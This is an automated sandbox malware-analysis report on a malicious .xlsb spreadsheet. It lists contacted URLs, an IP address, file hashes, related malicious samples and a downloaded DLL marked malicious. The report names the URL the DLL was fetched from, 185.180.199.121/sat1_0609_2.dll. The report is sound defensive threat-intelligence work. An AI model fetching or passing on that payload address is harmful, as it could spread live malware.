https://dev0-api.acompli.net/autodetect	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://web.microsoftstream.com/video/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://graph.windows.net	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://dataservice.o365filtering.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://ncus.contentsync.	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
http://weather.service.msn.com/data.aspx	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://apis.live.net/v5.0/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://management.azure.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://wus2.contentsync.	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
http://ocsp.sectigo.com0	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://insertmedia.bing.office.net/odc/insertmedia	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://api.office.net	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://incidents.diagnosticssdf.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://entitlement.diagnostics.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://outlook.office.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://templatelogging.office.com/client/log	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://outlook.office365.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://webshell.suite.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://management.azure.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://devnull.onenote.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://ncus.pagecontentsync.	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://messaging.office.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://augloop.office.com/v2	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://skyapi.live.net/Activity/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://dataservice.o365filtering.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.180.199.121	unknown	Netherlands		14576	HOSTING-SOLUTIONSUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432263
Start date:	09.06.2021
Start time:	23:53:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 14s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Total_order_data-V2434883.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.evad.winXLSB@5/10@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 6.3% (good quality ratio 4.2%) Quality average: 67.2% Quality standard deviation: 46.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.147.198.201, 40.88.32.150, 52.255.188.83, 52.109.76.68, 52.109.88.38, 52.109.8.25, 23.218.208.56, 67.26.83.254, 67.27.157.126, 8.248.113.254, 67.26.73.254, 8.248.131.254, 20.190.160.134, 20.190.160.73, 20.190.160.136, 20.190.160.129, 20.190.160.132, 20.190.160.75, 20.190.160.8, 20.190.160.2, 20.69.130.185, 20.72.88.19, 20.54.26.129, 20.75.105.140, 92.122.213.247, 92.122.213.194, 52.184.81.210 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, iris-de-prod-azsc-wus2-b.westus2.cloudapp.azure.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
23:55:38	API Interceptor	1x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.180.199.121	Delivery_Information_7038598.xlsb	Get hash	malicious	Browse	185.180.199.121/sat1_0609_2.dll

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTING-SOLUTIONSUS	Delivery_Information_7038598.xlsb	Get hash	malicious	Browse	185.180.199.121
	W6DkFm55kO.exe	Get hash	malicious	Browse	162.248.225.14
	Lma2EzVvAK.exe	Get hash	malicious	Browse	185.180.198.250
	wEcncyxrEe	Get hash	malicious	Browse	104.193.252.114
	immed_paym_req_44191988.doc	Get hash	malicious	Browse	185.159.82.194
	zKOi8vCorq.exe	Get hash	malicious	Browse	185.180.198.99
	invoice_100221.doc	Get hash	malicious	Browse	185.180.198.135
	new shippment.xlsx	Get hash	malicious	Browse	185.180.198.135
	w3QgrgNAWs.exe	Get hash	malicious	Browse	185.180.198.99
	yWWZnMPf9D.exe	Get hash	malicious	Browse	185.180.198.99
	zLjBdL6Lbk.exe	Get hash	malicious	Browse	185.180.198.141
	DHL_file094883764773845.exe	Get hash	malicious	Browse	162.244.32.175
	https://bit.ly/3547mtO	Get hash	malicious	Browse	162.244.32.223
	http://436095.com/cwuobmjj/lnclqsrq.html?5crjx3rlwse.eps2k	Get hash	malicious	Browse	162.244.32.223
	https://bit.ly/2H1vYuP	Get hash	malicious	Browse	162.244.32.223
	https://bit.ly/33rThah	Get hash	malicious	Browse	162.244.32.223
	https://bit.ly/3l3ZAqg	Get hash	malicious	Browse	162.244.32.223
	http://275496.com/socsirmn/imokzmwd.html?2t2i2lh.4lur	Get hash	malicious	Browse	162.244.32.223
	yXkNVMiowl.docm	Get hash	malicious	Browse	185.159.82.237
	https://bit.ly/2GrEGSX	Get hash	malicious	Browse	162.244.32.223

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E1CDFF1D-0935-429C-935F-99A7DA32E11F Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134915
Entropy (8bit):	5.369295050894367
Encrypted:	false
SSDEEP:	1536:AcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:IEQ9DQW+zAXOe
MD5:	5B697FD2BDEAA84CDA97428A619077E2
SHA1:	8A87EAF1F9495BD158120B6908D566147B08E54D
SHA-256:	0022C4154594DEE06BD1F1EAF86895E82142E411D808D37F80AB3E5C2CBB29C4
SHA-512:	7D1864D285B29EB962B393FF44618602965C9E860ED0762401A3C996934B1121AF0227B421122A548220F419DF5A083F693D5B564F0CC0D1D6D6213C59AFDF4C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-09T21:54:44">.. Build: 16.0.14207.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\11B5F99.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6177
Entropy (8bit):	7.959095006853368
Encrypted:	false
SSDEEP:	96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
MD5:	C7ED6FC355D8632DB1464BE3D56BF5CC
SHA1:	615484A338922DDF00B903CFA48060AD60D70207
SHA-256:	26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
SHA-512:	FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......\|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[\|\.1..]v..A..G..y._3...3M.YG7.J.)..RK]u.j}.^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.\|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.\|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\39FE7E0F.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5744
Entropy (8bit):	7.966496386988271
Encrypted:	false
SSDEEP:	96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
MD5:	9AD30E24270C495AE68EAF3A1EEECBFB
SHA1:	8642D256E7FFBEF5804A2D2220A1FE475A99DC36
SHA-256:	6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
SHA-512:	EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX..feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.\|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n\|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....'Nx^....C..b...8........\|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C6BD0C6.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	9924
Entropy (8bit):	7.973758306371751
Encrypted:	false
SSDEEP:	192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
MD5:	B34FB4F2F0F9E70B72BA3AFD028CD97C
SHA1:	C6868336F78DEA1E718965DF3341039581DB5B5A
SHA-256:	189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
SHA-512:	4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.\|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A79D60C4.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	956
Entropy (8bit):	7.683552542542939
Encrypted:	false
SSDEEP:	24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
MD5:	32C83607A5C98C5A634278E5AED3AD61
SHA1:	EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
SHA-256:	4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
SHA-512:	AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.\|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]....@.-.L..G.....Q."..%fb.Z.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u\|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B7ECCFF8.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	23989
Entropy (8bit):	7.989754044300238
Encrypted:	false
SSDEEP:	384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
MD5:	839795652A8FE78F26F4D86D757ABDE8
SHA1:	979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
SHA-256:	1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
SHA-512:	E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..\|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b...........\|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T.J)..+.KWt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\......hU\..W.m.I..\|.0\...o..?c.a3'.2}...u....`.9......q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.rv...U.0..._?.5\|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m\|...w_...1.i..bs.F..L.`.}..6V..w.....z

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	525280
Entropy (8bit):	7.308601583725249
Encrypted:	false
SSDEEP:	6144:rCqCGToDHEHD7pPV25vyGOZYjbLvD6RVioO6gZ6xv4hCZWrVcXRYpmPBOA:uTGTGkn5gqufLvDcVzPR0kWA
MD5:	1E2385B6C669BA98831B97915F6ACEBA
SHA1:	A1966D5CEB273CC669C8D6829E2EC9E842D6E482
SHA-256:	337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
SHA-512:	1780797924A0DD5D8E53C23CCFA2E5740BA2E58EC7E7BAEF3A362EACF7956B87D58AAF341DBF8F9F3B4B07853415404BB496DA039D448E43090478E07FFB3B00
Malicious:	true
IE Cache URL:	http://185.180.199.121/sat1_0609_2.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............A...A...A...A...A...A...A...A...A...AS..A...A...Ar..A...A"..A...Ar..A...Ar..A...ARich...A........................PE..L.....t`...........!.....@..................P............................... ......d...............................`...U............P...i...............#.......0...................................................P...............................text....7.......@.................. ..`.rdata.......P.......P..............@..@.data....c.......0..................@....rsrc....i...P...p..................@..@.reloc..._.......`..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9A810000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	80026
Entropy (8bit):	7.896060070191053
Encrypted:	false
SSDEEP:	1536:zZMVmEKjBX9U8fWGHzDmf5TOlMVGoIahaDHTU6hryF70KiiAeWhS:empX9U8fW2XmfU2sTU2yF70Kiil
MD5:	BFBFB6BA89E73507BAC1C68C39C2089C
SHA1:	4DF55BED20FBB6EB4BD82B3A14099A6F0CA6E408
SHA-256:	AFDC508F7F53597FF6E95AED1E5AAA31A5C45995D9FDD7B908DA28BEBBB33CF2
SHA-512:	8A969ECE3B3A682EFB254EB4E07F155C2FF871F3D3B4E986339948855E21204DF98EAD45B50920DFC81941F020FED06B7629E37B562608FC9A5056BFCC6BAF4F
Malicious:	false
